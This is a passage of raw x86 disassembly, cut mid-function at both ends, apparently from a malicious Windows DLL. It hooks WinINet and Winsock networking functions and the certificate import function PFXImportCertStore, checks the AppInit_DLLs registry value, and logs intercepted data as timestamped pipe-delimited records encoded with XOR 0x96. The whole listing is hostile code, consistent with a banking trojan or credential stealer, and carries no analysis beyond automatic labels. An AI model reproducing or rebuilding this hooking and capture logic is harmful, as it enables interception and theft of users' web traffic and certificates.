mov edx, [ebp+lpWideCharStr]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_10073DAC
mov [ebp+var_E4], eax
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push 0FFh ; cbMultiByte
lea edx, [ebp+Str1]
push edx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
mov eax, [ebp+lpWideCharStr]
push eax ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:WideCharToMultiByte ; WideCharToMultiByte
push offset aAppinit_dlls ; "AppInit_DLLs"
lea ecx, [ebp+Str1]
push ecx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000FDA9
mov [ebp+var_E4], 1
loc_1000FDA9: ; CODE XREF: sub_1000FCEB+B2�j
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_1
jmp short loc_1000FDB8
sub_1000FCEB endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000FCEB
loc_1000FDB8: ; CODE XREF: sub_1000FCEB+CA�j
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 20h
; END OF FUNCTION CHUNK FOR sub_1000FCEB
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000FDD1 proc near ; DATA XREF: .data:10022014�o
push ebp
mov ebp, esp
call sub_1000FDDB
pop ebp
retn
sub_1000FDD1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000FDDB proc near ; CODE XREF: sub_1000FDD1+3�p
push ebp
mov ebp, esp
mov eax, ds:GetModuleFileNameW
mov dword_10073B68, eax
mov ecx, dword_10073B68
mov dword_10073B68, ecx
mov edx, ds:CreateProcessW
mov dword_10073DB8, edx
mov eax, dword_10073DB8
mov dword_10073DB8, eax
mov ecx, ds:send
mov dword_10073B88, ecx
mov edx, dword_10073B88
mov dword_10073B88, edx
mov eax, ds:GetUrlCacheEntryInfoA
mov dword_10073B60, eax
mov ecx, dword_10073B60
mov dword_10073B60, ecx
mov edx, ds:InternetConnectA
mov dword_10073DA8, edx
mov eax, dword_10073DA8
mov dword_10073DA8, eax
mov ecx, ds:LoadLibraryA
mov dword_10073DC4, ecx
mov edx, dword_10073DC4
mov dword_10073DC4, edx
mov eax, ds:InternetReadFile
mov dword_10073DC0, eax
mov ecx, dword_10073DC0
mov dword_10073DC0, ecx
mov edx, ds:InternetWriteFile
mov dword_10073B8C, edx
mov eax, dword_10073B8C
mov dword_10073B8C, eax
mov ecx, ds:InternetReadFileExA
mov dword_10073DCC, ecx
mov edx, dword_10073DCC
mov dword_10073DCC, edx
mov eax, ds:InternetOpenUrlA
mov dword_10073B74, eax
mov ecx, dword_10073B74
mov dword_10073B74, ecx
mov edx, ds:HttpOpenRequestA
mov dword_10073A4C, edx
mov eax, dword_10073A4C
mov dword_10073A4C, eax
mov ecx, ds:HttpSendRequestW
mov dword_10073D9C, ecx
mov edx, dword_10073D9C
mov dword_10073D9C, edx
mov eax, ds:HttpSendRequestA
mov dword_10073DA0, eax
mov ecx, dword_10073DA0
mov dword_10073DA0, ecx
mov edx, ds:InternetQueryDataAvailable
mov dword_10073B70, edx
mov eax, dword_10073B70
mov dword_10073B70, eax
mov ecx, ds:HttpSendRequestExA
mov dword_10073DBC, ecx
mov edx, dword_10073DBC
mov dword_10073DBC, edx
mov eax, ds:GetProcAddress
mov dword_10073B80, eax
mov ecx, dword_10073B80
mov dword_10073B80, ecx
mov edx, ds:InternetSetStatusCallback
mov dword_10073DD0, edx
mov eax, dword_10073DD0
mov dword_10073DD0, eax
mov ecx, ds:PFXImportCertStore
mov dword_10073DC8, ecx
mov edx, dword_10073DC8
mov dword_10073DC8, edx
mov eax, ds:WSASend
mov dword_10073A58, eax
mov ecx, dword_10073A58
mov dword_10073A58, ecx
pop ebp
retn
sub_1000FDDB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E488
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
mov eax, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
call dword_10073B90
mov [ebp-1Ch], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
call nullsub_2
jmp short loc_1000FFE3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_1000FFE3: ; CODE XREF: .text:1000FFE0�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000FFF9(int, LPCWSTR lpWideCharStr, int)
sub_1000FFF9 proc near ; DATA XREF: sub_1001338E+30�o
; sub_100134D4+30�o
var_11C = dword ptr -11Ch
Source = byte ptr -118h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpWideCharStr = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 100100E4 SIZE 00000019 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E498
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFEF4h
push ebx
push esi
push edi
mov [ebp+var_11C], 0
mov [ebp+var_4], 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+lpWideCharStr]
push ecx
mov edx, [ebp+arg_0]
push edx
call dword_10073DC8
mov [ebp+var_11C], eax
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push 0FFh ; cbMultiByte
lea eax, [ebp+Source]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
mov ecx, [ebp+lpWideCharStr]
push ecx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:WideCharToMultiByte ; WideCharToMultiByte
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_100236E4 ; "======"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_100220BC
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_100236EC ; "======\r\n"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
lea ecx, [ebp+Source]
push ecx ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset aEnd ; "=====End=====\r\n"
call sub_1000291D
add esp, 0Ch
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_3
jmp short loc_100100E4
sub_1000FFF9 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000FFF9
loc_100100E4: ; CODE XREF: sub_1000FFF9+E8�j
mov eax, [ebp+var_11C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_1000FFF9
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100100FD(LPCWSTR lpWideCharStr, int, int, int, int, int, int)
sub_100100FD proc near ; DATA XREF: sub_1001338E+19�o
; sub_100134D4+19�o
var_11C = dword ptr -11Ch
String2 = byte ptr -118h
var_10 = dword ptr -10h
var_4 = dword ptr -4
lpWideCharStr = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
; FUNCTION CHUNK AT 1001026F SIZE 00000019 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E4A8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFEF4h
push ebx
push esi
push edi
mov [ebp+var_11C], 0
mov [ebp+var_4], 0
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push 0FFh ; cbMultiByte
lea eax, [ebp+String2]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
mov ecx, [ebp+lpWideCharStr]
push ecx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:WideCharToMultiByte ; WideCharToMultiByte
push 1 ; int
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_100220B8
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; Str2
lea ecx, [ebp+String2]
push ecx ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_10010238
push 4008h ; Size
call ds:malloc ; malloc
add esp, 4
mov lpParameter, eax
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10057ED8, eax
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, dword_10057ED8
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 1000h ; Size
push offset dword_10057ED8 ; Src
mov ecx, lpParameter
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov edx, lpParameter
mov dword ptr [edx+4004h], 0
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, lpParameter
mov [ecx+4000h], eax
push offset byte_10073E08 ; Source
mov edx, lpParameter
mov eax, [edx+4000h]
push eax ; Dest
call strcpy ; strcpy
add esp, 8
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, lpParameter
push ecx ; lpParameter
push offset sub_1000B027 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_10010238: ; CODE XREF: sub_100100FD+85�j
mov edx, [ebp+arg_18]
push edx
mov eax, [ebp+arg_14]
push eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+lpWideCharStr]
push edx
call dword_10073A48
mov [ebp+var_11C], eax
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_4
jmp short loc_1001026F
sub_100100FD endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_100100FD
loc_1001026F: ; CODE XREF: sub_100100FD+16F�j
mov eax, [ebp+var_11C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 1Ch
; END OF FUNCTION CHUNK FOR sub_100100FD
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E4B8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov dword ptr [ebp-4], 0
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call dword_10073B80
mov [ebp-1Ch], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
call nullsub_5
jmp short loc_100102D2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_100102D2: ; CODE XREF: .text:100102CF�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100102E8 proc near ; DATA XREF: sub_1001036D+39�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
loc_100102F3: ; CODE XREF: sub_100102E8+63�j
mov eax, [ebp+var_4]
cmp dword_10073A5C[eax*4], 0
jz short loc_1001034D
cmp [ebp+var_4], 190h
jnb short loc_1001034D
mov ecx, [ebp+var_4]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+0Ch]
cmp eax, [ebp+arg_4]
jnz short loc_10010342
cmp [ebp+arg_8], 64h
jnz short loc_10010342
cmp dword_10073DFC, 1
jz short loc_10010333
cmp dword_10073E00, 1
jnz short loc_10010342
loc_10010333: ; CODE XREF: sub_100102E8+40�j
mov ecx, hEvent
push ecx ; hEvent
call ds:SetEvent ; SetEvent
jmp short loc_10010367
; ---------------------------------------------------------------------------
loc_10010342: ; CODE XREF: sub_100102E8+31�j
; sub_100102E8+37�j ...
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_100102F3
; ---------------------------------------------------------------------------
loc_1001034D: ; CODE XREF: sub_100102E8+16�j
; sub_100102E8+1F�j
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_10073DD4
loc_10010367: ; CODE XREF: sub_100102E8+58�j
mov esp, ebp
pop ebp
retn 14h
sub_100102E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001036D proc near ; DATA XREF: sub_1001338E+E8�o
; sub_100134D4+E8�o
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 100103C7 SIZE 00000016 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E4C8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_4], 0
mov eax, [ebp+arg_4]
mov dword_10073DD4, eax
push offset sub_100102E8
mov ecx, [ebp+arg_0]
push ecx
call dword_10073DD0
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_6
jmp short loc_100103C7
sub_1001036D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1001036D
loc_100103C7: ; CODE XREF: sub_1001036D+57�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_1001036D
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E4D8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
mov eax, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
call dword_10073B60
mov [ebp-1Ch], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
call nullsub_7
jmp short loc_10010432
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_10010432: ; CODE XREF: .text:1001042F�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E4E8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
mov eax, [ebp+2Ch]
push eax
mov ecx, [ebp+28h]
push ecx
mov edx, [ebp+24h]
push edx
mov eax, [ebp+20h]
push eax
mov ecx, [ebp+1Ch]
push ecx
mov edx, [ebp+18h]
push edx
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call dword_10073DB8
mov [ebp-1Ch], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
call nullsub_8
jmp short loc_100104B9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_100104B9: ; CODE XREF: .text:100104B6�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 28h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E4F8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-4], 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call off_10023414
mov [ebp-1Ch], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
call nullsub_9
jmp short loc_1001052F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_1001052F: ; CODE XREF: .text:1001052C�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E508
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call off_10023418
mov [ebp-1Ch], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
call nullsub_10
jmp short loc_1001059E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_1001059E: ; CODE XREF: .text:1001059B�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E518
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov dword ptr [ebp-4], 0
mov eax, [ebp+8]
push eax
call dword_10073DC4
mov [ebp-1Ch], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_100105F9
jmp short loc_1001060D
; =============== S U B R O U T I N E =======================================
sub_100105F9 proc near ; CODE XREF: .text:100105F2�p
; DATA XREF: .rdata:1001E520�o
push 0 ; uType
push offset Caption ; "LoadLibrary"
mov ecx, [ebp+8]
push ecx ; lpText
push 0 ; hWnd
call ds:MessageBoxA ; MessageBoxA
retn
sub_100105F9 endp
; ---------------------------------------------------------------------------
loc_1001060D: ; CODE XREF: .text:100105F7�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_10010623(LPVOID)
sub_10010623 proc near ; DATA XREF: sub_100108A3+46E�o
; sub_10011167+4A0�o ...
var_68 = dword ptr -68h
lpString1 = dword ptr -64h
SystemTime = _SYSTEMTIME ptr -60h
lpBuffer = dword ptr -50h
lpString2 = dword ptr -4Ch
lpString = dword ptr -48h
Dest = byte ptr -44h
var_43 = byte ptr -43h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 68h
push esi
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_68], eax
mov [ebp+lpBuffer], 0
mov [ebp+Dest], 0
mov ecx, 0Fh
xor eax, eax
lea edi, [ebp+var_43]
rep stosd
stosw
stosb
mov [ebp+lpString], 0
mov ecx, [ebp+lpString]
push ecx ; lpString1
call sub_1000EB30
add esp, 4
mov [ebp+lpString], eax
lea edx, [ebp+SystemTime]
push edx ; lpSystemTime
call ds:GetSystemTime ; GetSystemTime
mov eax, dword ptr [ebp+SystemTime.wMinute]
and eax, 0FFFFh
push eax
mov ecx, [ebp-58h]
and ecx, 0FFFFh
push ecx
mov edx, dword ptr [ebp+SystemTime.wDay]
and edx, 0FFFFh
push edx
mov eax, dword ptr [ebp+SystemTime.wMonth]
and eax, 0FFFFh
push eax
mov ecx, dword ptr [ebp+SystemTime.wYear]
and ecx, 0FFFFh
push ecx
push offset aD_D_DDD ; "%d.%d.%d %d:%d"
lea edx, [ebp+Dest]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 1Ch
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022050
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_20 ; "%s%s"
mov edx, [ebp+lpString1]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov eax, [ebp+var_68]
mov ecx, [eax+8]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov edx, [ebp+lpString]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
lea eax, [esi+eax+400h]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov ecx, [ebp+var_68]
mov edx, [ecx+8]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov eax, [ebp+lpString]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
lea ecx, [esi+eax+400h]
push ecx ; Size
push 0 ; Val
mov edx, [ebp+lpString2]
push edx ; Dst
call memset ; memset
add esp, 0Ch
cmp dword_1003712C, 0
jz short loc_10010762
mov eax, [ebp+var_68]
mov ecx, [eax]
add ecx, 0Ah
mov edx, [ebp+var_68]
mov [edx], ecx
loc_10010762: ; CODE XREF: sub_10010623+130�j
mov eax, [ebp+lpString]
push eax
lea ecx, [ebp+Dest]
push ecx
mov edx, [ebp+var_68]
mov eax, [edx+8]
push eax
mov ecx, [ebp+var_68]
mov edx, [ecx+4]
push edx
push offset byte_10065ED8
mov eax, [ebp+var_68]
mov ecx, [eax]
push ecx
push offset aDSSSSS ; "%d|%s|%s|%s|%s|%s"
mov edx, [ebp+lpString2]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 20h
mov [ebp+var_4], 0
jmp short loc_100107A7
; ---------------------------------------------------------------------------
loc_1001079E: ; CODE XREF: sub_10010623+1A5�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_100107A7: ; CODE XREF: sub_10010623+179�j
mov ecx, [ebp+lpString2]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
cmp [ebp+var_4], eax
jge short loc_100107CA
mov edx, [ebp+lpString2]
add edx, [ebp+var_4]
mov al, [edx]
xor al, 96h
mov ecx, [ebp+lpString2]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_1001079E
; ---------------------------------------------------------------------------
loc_100107CA: ; CODE XREF: sub_10010623+191�j
mov edx, [ebp+lpString2]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov eax, [ebp+lpString1]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
lea ecx, [esi+eax+1]
push ecx ; NewSize
mov edx, [ebp+lpString1]
push edx ; Memory
call ds:realloc ; realloc
add esp, 8
mov [ebp+lpString1], eax
mov eax, [ebp+lpString2]
push eax ; lpString2
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
push 5 ; int
push 0 ; Source
push 0 ; lpFileName
mov edx, [ebp+lpBuffer]
push edx ; lpBuffer
mov eax, [ebp+lpString1]
push eax ; lpString2
call sub_10005E66
add esp, 14h
mov [ebp+lpBuffer], eax
mov eax, 1
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
sub_10010623 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10010829 proc near ; DATA XREF: sub_1001338E+A3�o
; sub_100134D4+A3�o
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 1001088D SIZE 00000016 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E528
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_4], 0
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call dword_10073B70
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_1001087A
jmp short loc_1001088D
sub_10010829 endp
; =============== S U B R O U T I N E =======================================
sub_1001087A proc near ; CODE XREF: sub_10010829+4A�p
; DATA XREF: .rdata:1001E530�o
cmp dword_10073DFC, 2
jnz short locret_1001088C
mov ecx, [ebp+0Ch]
mov dword ptr [ecx], 800h
locret_1001088C: ; CODE XREF: sub_1001087A+7�j
retn
sub_1001087A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10010829
loc_1001088D: ; CODE XREF: sub_10010829+4F�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_10010829
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100108A3 proc near ; DATA XREF: sub_1001338E+D1�o
; sub_100134D4+D1�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
lpParameter = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
lpString2 = dword ptr -58h
Size = dword ptr -54h
var_50 = dword ptr -50h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 10011151 SIZE 00000016 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E538
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFF9Ch
push ebx
push esi
push edi
mov [ebp+var_20], 0
mov [ebp+var_28], 0
mov [ebp+var_1C], 0FFFFFFFFh
mov [ebp+var_4], 0
cmp dword_10073E00, 0
jnz loc_10010989
loc_100108EF: ; CODE XREF: sub_100108A3+A4�j
mov eax, [ebp+var_28]
cmp dword_10073A5C[eax*4], 0
jz short loc_10010949
cmp [ebp+var_28], 190h
jge short loc_10010949
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+8]
cmp eax, [ebp+arg_0]
jnz short loc_1001093E
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
cmp dword ptr [edx], 0FFFFFFFFh
jz short loc_1001093E
mov eax, [ebp+var_28]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+0Ch]
mov [ebp+var_20], eax
jmp short loc_10010949
; ---------------------------------------------------------------------------
loc_1001093E: ; CODE XREF: sub_100108A3+72�j
; sub_100108A3+81�j
mov ecx, [ebp+var_28]
add ecx, 1
mov [ebp+var_28], ecx
jmp short loc_100108EF
; ---------------------------------------------------------------------------
loc_10010949: ; CODE XREF: sub_100108A3+57�j
; sub_100108A3+60�j ...
cmp [ebp+var_1C], 0FFFFFFFFh
jz short loc_10010970
push 10h ; Size
call ds:malloc ; malloc
add esp, 4
mov Memory, eax
mov edx, dword_10073E00
add edx, 1
mov dword_10073E00, edx
jmp short loc_10010989
; ---------------------------------------------------------------------------
loc_10010970: ; CODE XREF: sub_100108A3+AA�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call dword_10073DCC
mov [ebp+var_24], eax
loc_10010989: ; CODE XREF: sub_100108A3+46�j
; sub_100108A3+CB�j
cmp dword_10073E00, 1
jnz loc_10010A42
